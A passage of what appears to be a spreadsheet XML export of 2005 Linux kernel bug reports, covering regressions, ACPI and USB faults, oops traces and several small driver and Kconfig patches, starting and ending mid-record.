    <t>2005-11-12 02:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.4 Distribution: Slackware Problem Description: After upgrding my kernel to 2.6.14-rc4 I noticed that SVGATextMode, instead of changing screen resolution to 100x40, messed my console completely. Reverting those two patches helps: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=6d36ba629e0ef47a03d3703ee1d38143c25532a8;hp=7b6a186d65589901a73d460070504a5e02703c45 http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=28254d439b8c65f93cb331f5aa741efa6a8ec62f;hp=ff55fe2075e3901db4dbdc00e0b44a71bef97afd Steps to reproduce: Use SVGATextMode to change screen resolution. Tested on: - Matrox Graphics, Inc. MGA G200 AGP</t>
  </si>
  <si>
    <t>regression: 2.6.13 boot hang if HT enabled</t>
  </si>
  <si>
    <t>2.6.13 and newer</t>
  </si>
  <si>
    <t>2005-10-16 09:51 UTC</t>
  </si>
  <si>
    <t>Joerg Platte</t>
  </si>
  <si>
    <t>2006-06-25 21:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.12.X Distribution:Debian (vanilla Kernel) Hardware Environment:Fujitsu Siemens Scenic W600 Software Environment: Problem Description: The problem exist on various Fujitsu-Siemens computers (W600 series). Kernels up to 2.6.12 can boot without ACPI related problems. All tested newer kernels (2.6.13, 2.6.13.3 and 2.6.14-rc3) hang after ACPI CPU detection. I solved this problem temporaly by disabling hypter threading in BIOS, but there should be a better solution. The dsdt can be found here: http://www-ds.e-technik.uni-dortmund.de/~jplatte/dsdt.w600 Steps to reproduce: Boot with Hyper Threading enabled...</t>
  </si>
  <si>
    <t>2.6.14-rc4-mm1</t>
  </si>
  <si>
    <t>Battery info no longer available - AE_AML_METHOD_LIMIT</t>
  </si>
  <si>
    <t>2.6.14-rc4-git</t>
  </si>
  <si>
    <t>2005-10-18 10:40 UTC</t>
  </si>
  <si>
    <t>Alejandro Bonilla Beeche</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Sid/Unstable Hardware Environment: IBM T42 Software Environment: Debian Sid Problem Description: Problem occurs after I leave the PC for some long time with xlock running. Steps to reproduce: Problem occurs after I leave the PC for some long time with xlock running. (I use tpb to manage buttons, I leave xlock -mode matrix and then get back after some time. It might give the problem or might not, is really random. MORE: &gt; &gt;I think that whenever I put my PC on xlock(matrix screensaver BTW) for &gt; &gt;too long and then I come back, I see my gnome 2.10 battery &gt; &gt;icon says N/A. &gt; &gt; &gt; &gt;Then, dmesg is full of these messages. &gt; &gt; &gt; &gt; ACPI-0213: *** Error: Method reached maximum reentrancy limit (255) &gt; &gt; ACPI-0508: *** Error: Method execution failed &gt; &gt;[\_SB_.PCI0.LPC_.EC__.BAT0._BIF] (Node c14cd4c0), AE_AML_METHOD_LIMIT &gt; &gt; ACPI-0213: *** Error: Method reached maximum reentrancy limit (255) &gt; &gt; ACPI-0508: *** Error: Method execution failed &gt; &gt;[\_SB_.PCI0.LPC_.EC__.BAT0._BIF] (Node c14cd4c0), AE_AML_METHOD_LIMIT &gt; &gt; ACPI-0213: *** Error: Method reached maximum reentrancy limit (255) &gt; &gt; ACPI-0508: *** Error: Method execution failed &gt; &gt;[\_SB_.PCI0.LPC_.EC__.BAT0._BIF] (Node c14cd4c0), AE_AML_METHOD_LIMIT &gt; &gt; ACPI-0213: *** Error: Method reached maximum reentrancy limit (255) &gt; &gt; ACPI-0508: *** Error: Method execution failed &gt; &gt;[\_SB_.PCI0.LPC_.EC__.BAT0._BIF] (Node c14cd4c0), AE_AML_METHOD_LIMIT &gt; &gt; &gt; &gt;abonilla@debian:~$ apt-cache show acpi | grep Version &gt; &gt;Version: 0.09-1 &gt; &gt;abonilla@debian:~$ apt-cache show acpid | grep Version &gt; &gt;Version: 1.0.4-3 &gt; &gt; &gt; &gt;/etc/init.d/acpid restart has no effect. &gt; &gt; &gt; &gt;abonilla@debian:~$ acpi -V &gt; &gt; Thermal 1: ok, 40.0 degrees C &gt; &gt; AC Adapter 1: off-line &gt; &gt; &gt; &gt;It is just not showing the battery information.</t>
  </si>
  <si>
    <t>oops in usbcore with kernel 2.6.14-rc4 + gregkh-all-2.6.14-rc4.patch (18-Oct-2005 19:25)</t>
  </si>
  <si>
    <t>2.6.14-rc4 + gregkh-all-2.6.14-rc4.patch</t>
  </si>
  <si>
    <t>2005-10-19 09:41 UTC</t>
  </si>
  <si>
    <t>2005-10-21 15:43 UTC</t>
  </si>
  <si>
    <t>sorry I</t>
  </si>
  <si>
    <t>2.6.32</t>
  </si>
  <si>
    <t>USB mouse freezes in X</t>
  </si>
  <si>
    <t>2.6.13.4</t>
  </si>
  <si>
    <t>2005-10-20 14:30 UTC</t>
  </si>
  <si>
    <t>Christoffer S</t>
  </si>
  <si>
    <t>2006-04-10 17:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.10 Distribution: Ubuntu Hardware Environment: AMD Athlpn 1300, Nvidia GeForce2, Logitech Optical USB Mouse Software Environment: Ubuntu 5.04/Ubuntu 5.10 Problem Description: Booting into Gnome and reading webpages. Not using the mouse for a while. When I grab the mouse and want to move the pointer, the mouse is frozen. I have to switch terminals (Ctrl+Alt+F1) and back to F7 to get the mouse working again. Steps to reproduce: 1. Boot, log into Gnome. 2. Use your computer for a while (eg. type in a bugreport on kernel.org) 3. Move the mouse pointer. It appears frozen. This did not appear in kernel 2.6.10. The problem is apparent also in 2.6.12.</t>
  </si>
  <si>
    <t>Imre Péntek</t>
  </si>
  <si>
    <t>Exception BUFFER_LIMIT occurs instead of STRING_LIMIT one</t>
  </si>
  <si>
    <t>2005-10-21 07:21 UTC</t>
  </si>
  <si>
    <t>2.6.13.x crashes with enabled acpi-cpufreq</t>
  </si>
  <si>
    <t>2.6.13.x</t>
  </si>
  <si>
    <t>2005-10-22 13:16 UTC</t>
  </si>
  <si>
    <t>Boris Nicolaev</t>
  </si>
  <si>
    <t>2006-02-02 14:37 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.6 Distribution: Slackware 10.1 Hardware Environment: Toshiba Satellite A60-772 laptop with P4-M 3.2Ghz CPU Software Environment: Problem Description: System (kernel 2.6.13.x (x -- 1, 2, 3, 4)) crashes with 'Attempt to kill init' message (acpi-cpufreq compiled into kernel whith module -- the same result). Before crash, I can see this message (it taken from 2.6.14-rc5): .............................................................................. ACPI-0292: *** Error: Looking up [_PPC] in namespace, AE_ALREADY_EXISTS ACPI-0508: *** Error: Method execution failed [\_PR_.CPU0._PDC] (Node dbf83260), AE_ALREADY_EXISTS acpi-cpufreq: CPU0 - ACPI performance management activated. ACPI-0292: *** Error: Looking up [_PPC] in namespace, AE_ALREADY_EXISTS ACPI-0508: *** Error: Method execution failed [\_PR_.CPU1._PDC] (Node dbf83200), AE_ALREADY_EXISTS acpi-cpufreq: CPU1 - ACPI performance management activated. .............................................................................. I can't send 2.6.13.x dmesg message, because magic sequence doesn't work. After disabling acpi-cpufreq sysntem works normally. With 2.6.12.6 kernel -- all ok. With 2.6.14-rc5 i get the same error message, but system works normally and I can change cpu frequency. Also, acpi_serialize option not helpful. Steps to reproduce: Install 2.6.13 kernel on @#$@$@ Toshiba Satellite A60-772 notebook.</t>
  </si>
  <si>
    <t>cdrom door locked when pktcdvd is attached</t>
  </si>
  <si>
    <t>2005-10-23 06:15 UTC</t>
  </si>
  <si>
    <t>Ulrich Holeschak</t>
  </si>
  <si>
    <t>2008-09-23 10:22 UTC</t>
  </si>
  <si>
    <t>Distribution: SUSE 9.3, Standard kernel 2.6.13.3 Problem Description: When pktcdvd driver is attached to a cdrom device, mounting the cdrom directly (without the packet driver) leads to a locked cdrom door after unmount. Reason: cdrom.c:cdrom_release() only unlocks the door if the use_count is zero. The pktcdvd driver always keeps one O_NONBLOCK connection open, so use_count will never get zero. Solution: I have attached a patch, that counts open device connections that don't have the O_NONBLOCK flag set (data connections). If the data connection counter is zero, the door is unlocked. I have also modified the autoeject feature. Now the cdrom is also ejected if the data connection counter is zero. This my be a problem if mount tries several file systems (auto), because in this case the tray opens after every filesystem mount tries to mount. Steps to reproduce: pktsetup 0 /dev/hdxx mount /dev/hdxx /mnt umount /mnt -&gt; cdrom door locked Patches: Here are the required patches. The patch is based on a SUSE kernel 2.6.11.4-21.9 kernel, but should also apply to recent standard kernels (the problem is the same). Modified lines are marked with [UH], so i can find then easier. Patch for cdrom.c: --- cdrom.c.org 2005-03-02 08:37:49.000000000 +0100 +++ cdrom.c 2005-10-23 13:30:14.000000000 +0200 @@ -1021,6 +1021,15 @@ if (ret) goto err; + /* [UH] start */ + if (!(fp-&gt;f_flags &amp; O_NONBLOCK)) + { + cdi-&gt;use_data_count++; + } + cdinfo(CD_OPEN, "Use data count for \"/dev/%s\" now %d\n", + cdi-&gt;name, cdi-&gt;use_data_count); + /* [UH] end */ + cdinfo(CD_OPEN, "Use count for \"/dev/%s\" now %d\n", cdi-&gt;name, cdi-&gt;use_count); /* Do this on open. Don't wait for mount, because they might @@ -1200,23 +1209,38 @@ int cdrom_release(struct cdrom_device_info *cdi, struct file *fp) { struct cdrom_device_ops *cdo = cdi-&gt;ops; - int opened_for_data; + // [UH] int opened_for_data; cdinfo(CD_CLOSE, "entering cdrom_release\n"); if (cdi-&gt;use_count &gt; 0) cdi-&gt;use_count--; + /* [UH] start */ + if (!(fp &amp;&amp; fp-&gt;f_flags &amp; O_NONBLOCK)) + { + if (cdi-&gt;use_data_count &gt; 0) + { + cdi-&gt;use_data_count--; + } + } + if (cdi-&gt;use_count == 0) + cdi-&gt;use_data_count = 0; + if (cdi-&gt;use_data_count == 0) + cdinfo(CD_CLOSE, "Use data count for \"/dev/%s\" now zero\n", cdi-&gt;name); + /* [UH] end */ + if (cdi-&gt;use_count == 0) cdinfo(CD_CLOSE, "Use count for \"/dev/%s\" now zero\n", cdi-&gt;name); if (cdi-&gt;use_count == 0) cdrom_dvd_rw_close_write(cdi); - if (cdi-&gt;use_count == 0 &amp;&amp; + // [UH] if (cdi-&gt;use_count == 0 &amp;&amp; + if (cdi-&gt;use_data_count == 0 &amp;&amp; (cdo-&gt;capability &amp; CDC_LOCK) &amp;&amp; !keeplocked) { cdinfo(CD_CLOSE, "Unlocking door!\n"); cdo-&gt;lock_door(cdi, 0); } - opened_for_data = !(cdi-&gt;options &amp; CDO_USE_FFLAGS) || - !(fp &amp;&amp; fp-&gt;f_flags &amp; O_NONBLOCK); + // [UH] opened_for_data = !(cdi-&gt;options &amp; CDO_USE_FFLAGS) || + // !(fp &amp;&amp; fp-&gt;f_flags &amp; O_NONBLOCK); /* * flush cache on last write release @@ -1225,8 +1249,10 @@ cdrom_close_write(cdi); cdo-&gt;release(cdi); - if (cdi-&gt;use_count == 0) { /* last process that closes dev*/ - if (opened_for_data &amp;&amp; + // [UH] if (cdi-&gt;use_count == 0) { /* last process that closes dev*/ + if (cdi-&gt;use_data_count == 0) { /* all data connections closed */ + // [UH] if (opened_for_data &amp;&amp; + if ( cdi-&gt;options &amp; CDO_AUTO_EJECT &amp;&amp; CDROM_CAN(CDC_OPEN_TRAY)) cdo-&gt;tray_move(cdi, 1); } Patch for cdrom.h: --- cdrom.h.org 2005-03-02 08:37:31.000000000 +0100 +++ cdrom.h 2005-10-20 00:04:02.000000000 +0200 @@ -943,6 +943,7 @@ int options : 30; /* options flags */ unsigned mc_flags : 2; /* media change buffer flags */ int use_count; /* number of times device opened */ + int use_data_count; /* [UH] number of times device opened in data mode */ char name[20]; /* name of the device type */ /* per-device flags */ __u8 sanyo_slot : 2; /* Sanyo 3 CD changer support */</t>
  </si>
  <si>
    <t>irq nobody cared - usb not working &gt;= 2.6.13</t>
  </si>
  <si>
    <t>2005-10-24 01:45 UTC</t>
  </si>
  <si>
    <t>Gernot Pansy</t>
  </si>
  <si>
    <t>2006-08-10 11:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: MSI MegaBook S270 (amd64) Software Environment: Kernel &gt;= 2.6.13 Problem Description: since kernel 2.16.13 (also 2.6.14-rc5) i'm unable to use usb on my notebook, due the irq nobidy card failure. booting with irqpoll is working, but than my notebook is very unstable. all other boot options (noapic,pci=routeirq,noacpi) are not working. also there is an other problem with die ATI IXP chipset, that the clock ticks double speed. but booting with option no_timer_check helps out. Steps to reproduce:</t>
  </si>
  <si>
    <t>Badness in discard_buffer at fs/buffer.c:1553</t>
  </si>
  <si>
    <t>2005-10-24 13:51 UTC</t>
  </si>
  <si>
    <t>2006-03-21 13:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:unknown Distribution:SLES 9 sp2 Hardware Environment:xseries - x370 Software Environment:2.6.14-rc4-mm1 Problem Description: Badness in discard_buffer at fs/buffer.c:1553 [&lt;c016dc1e&gt;] block_invalidatepage+0x10e/0x130 [&lt;c016db10&gt;] block_invalidatepage+0x0/0x130 [&lt;c016dc56&gt;] do_invalidatepage+0x16/0x20 [&lt;c016f75f&gt;] block_write_full_page+0x7f/0x100 [&lt;c01b3260&gt;] ext2_get_block+0x0/0x380 [&lt;c01b35e0&gt;] ext2_writepage+0x0/0x10 [&lt;c0191b2b&gt;] __mpage_writepage+0x58b/0x690 [&lt;c028c185&gt;] generic_make_request+0x145/0x240 [&lt;c01b3260&gt;] ext2_get_block+0x0/0x380 [&lt;c0129002&gt;] __do_softirq+0x82/0x100 [&lt;c0213579&gt;] radix_tree_gang_lookup_tag+0x49/0x70 [&lt;c0148fcc&gt;] find_get_pages_tag+0x7c/0x90 [&lt;c0153eba&gt;] pagevec_lookup_tag+0x2a/0x40 [&lt;c0191ff6&gt;] mpage_writepages+0x3c6/0x3f0 [&lt;c01b35e0&gt;] ext2_writepage+0x0/0x10 [&lt;c01b3260&gt;] ext2_get_block+0x0/0x380 [&lt;c01b4533&gt;] ext2_update_inode+0x1d3/0x330 [&lt;c014f634&gt;] do_writepages+0x24/0x30 [&lt;c01900e4&gt;] __sync_single_inode+0x64/0x250 [&lt;c0190355&gt;] __writeback_single_inode+0x85/0x180 [&lt;c012da80&gt;] process_timeout+0x0/0x10 [&lt;c028b6cb&gt;] blk_congestion_wait+0x8b/0xa0 [&lt;c019063d&gt;] generic_sync_sb_inodes+0x1ed/0x2f0 [&lt;c014fe70&gt;] pdflush+0x0/0x20 [&lt;c0190815&gt;] writeback_inodes+0xb5/0xc0 [&lt;c014f306&gt;] background_writeout+0x86/0xc0 [&lt;c014fd7d&gt;] __pdflush+0xbd/0x1b0 [&lt;c014fe8a&gt;] pdflush+0x1a/0x20 [&lt;c014f280&gt;] background_writeout+0x0/0xc0 [&lt;c014fe70&gt;] pdflush+0x0/0x20 [&lt;c0138e75&gt;] kthread+0xe5/0x130 [&lt;c0138d90&gt;] kthread+0x0/0x130 [&lt;c01029c5&gt;] kernel_thread_helper+0x5/0x10 Steps to reproduce: I run memtest from the STP testsuite and fsstress from the LTP suite in a loop. The fsstress test is run on /testfs: Filesystem Type 1K-blocks Used Available Use% Mounted on /dev/sda6 ext3 12262840 1838132 9801792 16% / tmpfs tmpfs 8187336 8 8187328 1% /dev/shm /dev/sda5 jfs 11509344 2331016 9178328 21% /testfs /dev/sda2 ext3 3099292 270788 2671068 10% /tests I see that in the trace there are many mentions of ext2 functins, but I do not have a ext2 fs on my machine so I have opened this bug against ext3. Let me know if this is not correct.</t>
  </si>
  <si>
    <t>Kernel should build on nls less systems (patch included)</t>
  </si>
  <si>
    <t>&gt;=2.6.12</t>
  </si>
  <si>
    <t>2005-10-26 07:19 UTC</t>
  </si>
  <si>
    <t>Yuri Vasilvski</t>
  </si>
  <si>
    <t>2005-11-17 14:03 UTC</t>
  </si>
  <si>
    <t>Logitech Mouse causes oops</t>
  </si>
  <si>
    <t>2.6.14 rc5 mm1</t>
  </si>
  <si>
    <t>2005-10-26 15:06 UTC</t>
  </si>
  <si>
    <t>2006-03-21 13:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.14 rc3 mm1 Distribution:SLES 9 sp2 Hardware Environment:xseries x370 Software Environment:2.6.14 rc5 mm1 Problem Description: During the bootup process I get an oops - io scheduler cfq registered&lt;4&gt;logips2pp: Detected unknown logitech mouse model 1 Unable to handle kernel NULL pointer dereference at virtual address 00000064 printing eip: c02874e0 *pde = 004a8001 Oops: 0000 [#1] SMP last sysfs file: Modules linked in: CPU: 4 EIP: 0060:[&lt;c02874e0&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.14-rc5-mm1) input: PS/2 Logitech Mouse//class/input as input2 EIP is at elevator_put+0x0/0x30 eax: 00000000 ebx: 00000000 ecx: c04ede40 edx: 00000000 esi: c966fe0c edi: c03f6d50 ebp: c029be40 esp: dfe41f5c ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=dfe40000 task=dfe00a90) Stack: c0287677 c966fe0c ffffffff c03f6d50 c028a829 000000c0 fffffff4 00000000 00000008 c0486a8b c966256c c039d990 00000007 c03a00ef c03f6d14 c049b70c 00000000 00000000 00000000 c0466aa3 00000000 dfe40000 00000000 dfe40000 Call Trace: [&lt;c0287677&gt;] elevator_init+0x17/0xa0 [&lt;c028a829&gt;] blk_init_queue_node+0xc9/0x130 [&lt;c0486a8b&gt;] floppy_init+0xdb/0x5e0 [&lt;c0466aa3&gt;] do_initcalls+0x23/0xc0 [&lt;c0100415&gt;] init+0x105/0x240 [&lt;c0100310&gt;] init+0x0/0x240 [&lt;c01029c5&gt;] kernel_thread_helper+0x5/0x10 Code: 85 c0 74 12 8b 12 8b 02 0f 18 00 90 81 fa 84 64 3f c0 75 d7 eb 05 89 d3 8d 76 00 89 d8 5b 5e 5f c3 8d 76 00 8d bc 27 00 00 00 00 &lt;8b&gt; 50 64 85 d2 74 1b b8 00 e0 ff ff 21 e0 8b 40 10 c1 e0 07 8d &lt;0&gt;Kernel panic - not syncing: Attempted to kill init! Steps to reproduce: Boot with 2.6.14 rc5 mm1 kernel</t>
  </si>
  <si>
    <t>regression: "undefined reference to `barrier'" during build</t>
  </si>
  <si>
    <t>2005-10-28 07:03 UTC</t>
  </si>
  <si>
    <t>R. Scott Bailey</t>
  </si>
  <si>
    <t>2005-11-17 14:04 UTC</t>
  </si>
  <si>
    <t>5515 5529</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14-rc5 Distribution: Debian testing/unstable (with a kernel.org kernel) Hardware Environment: Alphaserver 4100 5/466, 3 CPUs, 4GB Software Environment: gcc "4.0.2 (Debian 4.0.2-2", binutils from unstable Problem Description: kernel build fails with: [...] LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `kcopyd_exit': : undefined reference to `barrier' drivers/built-in.o: In function `kcopyd_exit': : undefined reference to `barrier' drivers/built-in.o: In function `kcopyd_exit': : undefined reference to `barrier' drivers/built-in.o: In function `kcopyd_exit': : undefined reference to `barrier' drivers/built-in.o: In function `kcopyd_exit': : undefined reference to `barrier' drivers/built-in.o:: more undefined references to `barrier' follow make[2]: *** [.tmp_vmlinux1] Error 1 make[1]: *** [deb-pkg] Error 2 make: *** [deb-pkg] Error 2 Steps to reproduce: tar xjf linux-2.6.14.tar.bz2 cd linux-2.6.14 zcat /proc/config.gz &gt; .config # This is my 2.6.14-rc5 configuration make oldconfig fakeroot make deb-pkg</t>
  </si>
  <si>
    <t>Cannot build XFS with quota support as module</t>
  </si>
  <si>
    <t>2005-10-28 08:06 UTC</t>
  </si>
  <si>
    <t>Puzin, Dimitri</t>
  </si>
  <si>
    <t>2006-04-10 11:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.4 Distribution: Debian GNU/Linux 3.1 Problem Description: Cannot build XFS filesystem support as module with quota support. It works only when the XFS filesystem support is compiled into the kernel. Menuconfig prevents from setting CONFIG_XFS_FS=m and CONFIG_XFS_QUOTA=y. How to reproduce: configure the XFS filesystem with quota support as module. The resulting kernel won't have quota support compiled into xfs.ko. Fix: Changing the fs/xfs/Kconfig file from tristate to bool lets you configure the quota support to be compiled into the XFS module. The Makefile-linux-2.6 checks only for CONFIG_XFS_QUOTA=y. Patch: diff -BurN linux-2.6.14/fs/xfs/Kconfig linux-2.6.14-working/fs/xfs/Kconfig --- linux-2.6.14/fs/xfs/Kconfig 2005-10-28 02:02:08.000000000 +0200 +++ linux-2.6.14-working/fs/xfs/Kconfig 2005-10-28 16:56:04.000000000 +0200 @@ -24,7 +24,7 @@ default y config XFS_QUOTA - tristate "XFS Quota support" + bool "XFS Quota support" depends on XFS_FS help If you say Y here, you will be able to set limits for disk usage on</t>
  </si>
  <si>
    <t>Reboot-through-BIOS does not mask APIC LVT interrupts - BIOS hang</t>
  </si>
  <si>
    <t>2.6.12 (earlier?)</t>
  </si>
  <si>
    <t>2005-10-28 11:59 UTC</t>
  </si>
  <si>
    <t>Boris Weissman</t>
  </si>
  <si>
    <t>2005-11-13 22:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: Ubuntu 5.10 Hardware Environment:P4, Opteron Software Environment: Problem Description: i386 version of Reboot-through-BIOS is unsafe: it forgets to mask APIC LVT interrupts before jumping to a BIOS entry point. As a result, BIOS ends up bombarded with interrupts early on boot. The BIOS does not expect it since following a "normal" hardware cpu reset, all APIC LVT registers have the Mask bit (16) set and can't generate interrupts. For example, the version of Phoenix BIOS used by VMware enables interrupts for the first time before masking/clearing APIC LVT. The APIC Timer LVT register is still set up for a timer interrupt delivery with a high vector from the previous Linux incarnation (0xef in our case). The BIOS has not fully initialized its IDT at this point and the real mode gate for 0xef remains all zeros. Vector 0xef dispatches BIOS to address 0:0, BIOS takes a #GP and eventually hangs. machine_shutdown() does attempt to shut down APIC before jumping to BIOS, but it is ineffective: /* * If Linux enabled the LAPIC against the BIOS default * disable it down before re-entering the BIOS on shutdown. * Otherwise the BIOS may get confused and not power-off. */ void lapic_shutdown(void) { if (!cpu_has_apic || !enabled_via_apicbase) return; local_irq_disable(); disable_local_APIC(); local_irq_enable(); } In the common case when LAPIC was correctly enabled by the BIOS initially, enabled_via_apicbase=0 and lapic_shutdown() does nothing; LVT remains active. Ubuntu 5.1 uses reboot through BIOS by default. One way to fix this bug is to move a call to clear_local_APIC() from disable_local_APIC() up to lapic_shutdown() as in (against 2.6.14): *** arch/i386/kernel/apic.c 2005-10-27 17:02:08.000000000 -0700 --- arch/i386/kernel/apic-patched.c 2005-10-28 11:54:38.856286802 -0700 *************** *** 267,274 **** { unsigned long value; - clear_local_APIC(); - /* * Disable APIC (implies clearing of registers * for 82489DX!). --- 267,272 ---- *************** *** 562,567 **** --- 560,572 ---- */ void lapic_shutdown(void) { + /* + * Always clear/mask APIC LVT even when APIC remains enabled + * to match the hardware state following reset and avoid + * interrupting the BIOS when it does not expect it. + */ + clear_local_APIC(); + if (!cpu_has_apic || !enabled_via_apicbase) return;</t>
  </si>
  <si>
    <t>(net bonding) Driver Marks itself as not VLAN Capable</t>
  </si>
  <si>
    <t>2005-10-28 13:56 UTC</t>
  </si>
  <si>
    <t>Steve Wormley</t>
  </si>
  <si>
    <t>2007-11-02 09:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.13(last tested) Distribution: SLES 9 Hardware Environment: Dual Opteron Software Environment: n/a Problem Description: VLAN driver cannot configure bonding device. After ifenslave of a VLAN capable device to a bonding device, the bonding device still marks itself as not VLAN capable. This appears to be a problem with the bond_dev-&gt;features flags being cleared by the VLAN Capabilities code which bond_compute_features then wipes out by using bond-&gt;bond_features. I added: bond-&gt;bond_features = bond_dev-&gt;features; before bond_compute_features(bond); in bond_main.c bond_enslave() to fix this issue for me.</t>
  </si>
  <si>
    <t>kernel stops software suspending and restarts tasks</t>
  </si>
  <si>
    <t>2005-10-29 11:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: vanilla kernel with ck1 2.6.14 (SuSE Linux 9.1) Linux HOST1 2.6.14-ck1 #1 PREEMPT Fri Oct 28 20:46:47 CEST 2005 i686 athlon i386 GNU/Linux Hardware Environment: AMD Athlon 2500+, NVidia nforce2 chipset, nvidia geforce 6800LE Graphic card Software Environment: Linux :) Problem Description: whenever i want to suspend my machine, the kernel stops its sheduled tasks and print: Oct 29 19:55:49 HOST1 kernel: Stopping tasks: ==================================================================| Oct 29 19:55:49 HOST1 kernel: Freeing memory... done (84720 pages freed) Oct 29 19:55:49 HOST1 kernel: NVRM: ACPI: unsupported event: 1 Oct 29 19:55:49 HOST1 kernel: Could not suspend device 0000:03:00.0: error -1 Oct 29 19:55:49 HOST1 kernel: logips2pp: Detected unknown logitech mouse model 1 Oct 29 19:55:49 HOST1 kernel: Some devices failed to suspend Oct 29 19:55:49 HOST1 kernel: Restarting tasks... done So, i looked after device "0000:03:00.0" and explored that it is this: 0000:03:00.0 VGA compatible controller: nVidia Corporation: Unknown device 0042 (rev a1) i've installed binary drivers from nVidia for my GeForce 6800LE card. however, i dont know what the expr "NVRM" means. it would be fine if you can fix this bug... Steps to reproduce: take my computer and enter /sbin/swsusp</t>
  </si>
  <si>
    <t>no help text for GAMEPORT_FM801</t>
  </si>
  <si>
    <t>2.6.14-rc5-mm1</t>
  </si>
  <si>
    <t>2005-10-30 21:10 UTC</t>
  </si>
  <si>
    <t>2006-01-30 08:56 UTC</t>
  </si>
  <si>
    <t>In drivers/input/gameport/Kconfig, there's no help text for GAMEPORT_FM801.</t>
  </si>
  <si>
    <t>No thermal events until acpi -t - HP nx6125</t>
  </si>
  <si>
    <t>2.6.14,2.6.13.4,2.6.12-1-amd64 (debian)</t>
  </si>
  <si>
    <t>2005-11-02 03:00 UTC</t>
  </si>
  <si>
    <t>Richard Mace</t>
  </si>
  <si>
    <t>2007-02-20 22:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none, as far as I can tell Distribution: Debian (amd64 port) Hardware Environment: HP nx6125 (AMD Turion ML 34, ATI Radeon express 200M chipset, onboard ATI X300) Software Environment: Kernel 2.6.13.4 (with Matthew Garrett's double timer patch applied), Debian amd64 (testing/unstable), WM = KDE 3.4.2. Also tried 2.6.14 (boot with no_timer_check) with same results Problem Description: ACPI thermal events rarely get processed, especially under moderate to high CPU load. This results in *no* or erratic fan use and potential damage to the machine/electronics. However, if the CPU temperature exceeds a thermal trip point and then one issues a cat /proc/acpi/thermal_zone/TZ?/temperature or an acpi -t, then, after a brief machine pause, the thermal event is processed by the kernel and the fans respond. This can be observed by stopping acpid and doing a cat /proc/acpi/event, which gives the most graphic evidence. A further and more detailed desciption/diagnosis of the problem can be found here ==&gt; http://lists.debian.org/debian-amd64/2005/10/msg01002.html Steps to reproduce: With a warm processor &lt; 58 degrees C (less than first thermal trip point), run glxgears and wait about a minute or so. Your fan will 90% of the time not kick in. Then execute an acpi -t or a cat /proc/acpi/thermal_zone/TZ?/temperature and almost immediately you will observe that (i) at least one of your thermal trip points have been exceeded and (ii) as a response to the cat command, the fans immediately turn on. Visual evidence can be had by first, before you do anything, stopping acpid and doing a cat /proc/acpi/event (as root). Then do the above procedure. You will observe no thermal event register *until* you do the cat or acpi -t.</t>
  </si>
  <si>
    <t>2.6.14-rc5</t>
  </si>
  <si>
    <t>compat wrapper for sys_sendfile is necessary on x86_64</t>
  </si>
  <si>
    <t>2.6.9, 2.6.10</t>
  </si>
  <si>
    <t>2005-11-02 05:37 UTC</t>
  </si>
  <si>
    <t>Alexandra Kossovsky</t>
  </si>
  <si>
    <t>2005-11-04 10:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: kernels from Ubuntu and RHEL, userland from Ubuntu Hardware Environment: AMD64 processor Software Environment: 64-bit(x86_64) kernel with 32-bit(i386) userland Problem Description: sendfile() system call does not behave correctly on 64-bit kernel with 32-bit executable/glibc. offset parameter is taken into account, but it is not updated at the end of system call. s390, parisc, sparc64 and ppc64 do have sys32_sendfile64 wrapper to handle 32-bit offset. We need the same wrapper for x86_64. Looking in the kernel source, it seems that the problem is not fixed in 2.6.13.4 Steps to reproduce: 1. run "nc -l -p 10000 &gt;/dev/null" 2. dd if=/dev/zero of=test count=8704 bs=1 3. compile attached program into 32-bit i[3456]86 executable. 4. On the systems with 32-bit kernels, it will run properly: File size is 8704 Connecting to 127.0.0.1:10000 ... ... done Sending file starting at 4000 offset... sent = 4704, offset = 8704 5. On the systems with 64-bit kernels, it will not update offset correctly: File size is 8704 Connecting to 127.0.0.1:10000 ... ... done Sending file starting at 4000 offset... sent = 4704, offset = 4000 The sample program will be attached to the bug.</t>
  </si>
  <si>
    <t>cpu_khz is not initialized if you boot with clock=pit</t>
  </si>
  <si>
    <t>2005-11-03 18:47 UTC</t>
  </si>
  <si>
    <t>2006-05-09 17:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None known Distribution: kernel.org kernel Hardware Environment: i386 Software Environment: boot with clock=pit on the command line Problem Description: The cpu_khz global is not initialized and remains 0 if you boot with clock=pit, even if the processor does have a TSC. This may have bad ramifications since the variable is used in various places scattered around the kernel, though I didn't check them all to see if they can tolerate cpu_khz = 0. You can observe the problem by doing "cat /proc/cpuinfo"; the cpu MHz line says 0.000. The fix is trivial; call init_cpu_khz() from init_pit(), just as it's called from the timers/timer_foo.c:init_foo() for other values of foo. Patch below. Steps to reproduce: Boot with clock=pit on the kernel command line. Patch (tested briefly and seems to work fine): --- arch/i386/kernel/timers/timer_pit.c~ 2005-08-24 18:54:21.000000000 -0700 +++ arch/i386/kernel/timers/timer_pit.c 2005-11-03 18:51:17.000000000 -0800 @@ -29,6 